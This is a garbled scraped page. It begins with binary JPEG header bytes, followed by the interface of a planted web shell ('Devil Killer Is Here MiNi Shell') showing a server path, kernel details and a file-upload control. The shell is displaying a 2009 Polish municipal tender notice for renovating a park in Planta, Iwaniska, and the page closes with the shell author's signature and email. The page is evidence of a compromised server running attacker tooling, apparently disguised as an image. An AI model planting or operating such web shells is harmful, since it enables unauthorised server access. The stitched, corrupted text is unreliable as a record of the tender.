JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090514/75643-N-2009.html

<p class="kh_header"><b>Iwaniska: Odnowa wsi w miejscowości Planta</b><br>
<b>Numer ogłoszenia: 75643 - 2009; data zamieszczenia: 14.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Iwaniska , ul. Rynek 3, 28-570 Iwaniska, woj. świętokrzyskie, tel. 015 8601254, faks 015 8601240.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odnowa wsi w miejscowości Planta.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 

Oznaczenie wg Wspólnego Słownika Zamówień: Odnowa wsi w miejscowości Planta - zagospodarowanie parku w miejscowości Planta obejmujące: 
-    budowa alejek w parku o nawierzchni żwirowej,
-   montaż altany drewnianej o powierzchni zabudowy 9,60 m2,
-   montaż ławek parkowych, koszy na śmieci, stojaków na rowery i tablic informacyjnych,
-   wykonanie oświetlenia terenu parku lampami parkowymi,
-   wykonanie wzdłuż drogi gminnej, po wschodniej stronie parku chodnika dla pieszych  o szerokości 1,00 m,

    -   w północnej części parku nasadzenie szpaleru drzew: lipa, buk, grab, dąb - przemiennie  w celu zasłonięcia zbiorników wody czystej dla wodociągu,
 - wykonanie zabiegów konserwacyjnych istniejących drzew..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1, 45.31.61.00-6, 45.11.27.10-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu oraz ocena spełnienia tych warunków

1.  O udzielenie zamówienie mogą ubiegać się oferenci, którzy spełnią następujące warunki:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym                 i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;  
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
 
 
 

2.  Z ubiegania się o udzielenie zamówienia publicznego wyklucza się Wykonawców którzy:

  1)   nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ustawy -
        Prawo zamówień publicznych opisanych w ppkt. 1.1.do 1.4,
  2)   podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy - Prawo
        zamówień publicznych.

3.  Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie złożonych przez 
Wykonawców dokumentów i oświadczeń. 

4.  Zamawiający odrzuca ofertę, która:

1)	jest niezgodna z ustawą,
2)	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt 3 ustawy - Prawo zamówień publicznych,
 3)   jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu  
       nieuczciwej konkurencji,
 4)   zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
 5)   została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o udzielenie 
       zamówienia,
 6)   zawiera błędy w obliczeniu ceny,
 7)   Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na
       poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy - Prawo zamówień 
       publicznych  
8)	jest nieważna na podstawie odrębnych przepisów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy  
     w celu potwierdzenia spełnienia warunków udziału w postępowaniu

1.  W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej 
     działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy  - 
     Prawo zamówień publicznych, Wykonawca składa następujące dokumenty:

1)   formularz ofertowy z wykorzystaniem wzoru - załącznik nr 2,
2)   aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji   
      działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub 
      zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy 
      przed upływem terminu składania ofert,
3)   dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają  
      z  przepisów prawa lub innych dokumentów rejestrowych,
4)   aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie
      właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie 
      określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed 
      upływem terminu składania ofert,
5)   aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 
      pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
6)   aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego  
      oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
      Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem 
      podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub
      zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na
      raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - 
      wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
7)   Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych 
      w art. 22 ustawy - Prawo zamówień publicznych - załącznik nr 3, 
8)   Informacja na temat wskazania przez Wykonawcę w ofercie części zamówienia, której 
      wykonanie powierzy podwykonawcom. Jeżeli Wykonawca zamierza powierzyć jakąś część
     robót podwykonawcy, do oferty należy dołączyć oświadczenie, w którym wskaże części 
     zamówienia, którą realizować będzie podwykonawca.

2.   W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje 
      potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, składa następujące
      dokumenty:
1)   Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia
      postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  
      w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym
      przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz 
      z dokumentami potwierdzającymi, że roboty zostały wykonane należycie ( protokół odbioru robót 
      i referencje - oryginał lub kserokopia potwierdzona za zgodność z oryginałem)
      a) co najmniej jedna robota z zakresu zabiegów konserwatorskich drzew w parkach zabytkowych,
      b) co najmniej jedna robota z zakresu zagospodarowania terenów parkowych (sadzenie drzew, 
          sianie trawy, montaż obiektów małej architektury, budowa alejek, chodników) o wartości co  
          najmniej 500.000,00 zł      
3)	Oświadczenie Wykonawcy, że dysponuje osobami posiadającymi uprawnienia i kwalifikacje,                    w tym kierownika budowy z uprawnieniami budowlanymi w specjalności konstrukcyjno - budowlanej, wpisanego na listę członków właściwej izby samorządu zawodowego oraz  osobę posiadającą uprawnienia konserwatorskie. 

3.   W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej  
       zapewniającej wykonanie zamówienia, składa następujące dokumenty:

1)   informacja banku, w którym Wykonawca posiada podstawowy rachunek bankowy, czy 
      posiada środki finansowe na sfinansowanie przedsięwzięcia  o wartości złożonej  oferty,  
      wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
2)  polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony
     od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.

4. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w dziale IX pkt. 1, ppkt. 2, 5, 6 składa dokumenty wystawione zgodnie z prawem kraju, w którym  ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 
       miesięcy przed upływem terminu składania ofert;
2)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie wystawiony nie
      wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
       3)   nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub  
             zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie
             na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego 
             organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania
             ofert.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

5. Dokumenty wymagane w przypadku składania oferty wspólnej

1)   Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla 
     ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania 
     w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.
2)  Oferta winna zawierać oświadczenia i dokumenty, o których mowa w dziale IX pkt. 1,  ppkt 2, 
     3, 4, 5, 6 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie. 

6.  Dokumenty dodatkowe 
     Oświadczenie o zastrzeżeniu tajności informacji stanowiących tajemnicę przedsiębiorstwa 
      -jeśli jest taka potrzebna.
     Informacje zawarte w ofercie, stanowiące tajemnicę przedsiębiorstwa w rozumieniu 
     przepisów ustawy o zwalczaniu nieuczciwej konkurencji, co do których Wykonawca 
     zastrzegł, nie później niż w terminie składania ofert, że nie mogą być udostępnione, 
     muszą być oznaczone klauzulą: NIE UDOSTĘPNIAĆ - INFORMACJE STANOWIĄ 
     TAJEMNICĘ PRZEDSIEBIORSTWA W ROZUMIENIU ART. 11 UST. 4 USTAWY 
     O ZWALCZANIU NIEUCZCIWEJ KONKURENCJI   tekst jednolity Dz. U. z 2003 r. nr 153 
      poz. 1503 ze zm. i załączone jako odrębna część niezłączona z ofertą w sposób trwały.

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez osobę -osoby uprawnione do podpisania oferty z dopiskiem  za zgodność z oryginałem.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

W przypadku załączenia do oferty innych materiałów niż wymagane przez Zamawiającego (np. materiałów reklamowych, informacyjnych) pożądane jest, aby stanowiły one odrębną część niezłączoną z ofertą w sposób trwały..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http:// iwaniska.pl/bip..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http:// iwaniska.pl/bip.
Urząd Gminy w  Iwaniskach
ul. Rynek  3
27-570	Iwaniska.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2009 godzina 10:00, miejsce: Urząd Gminy w  Iwaniskach
     ul. Rynek  3
     27-570  Iwaniska
    pokój nr  4 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> do 03.07.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com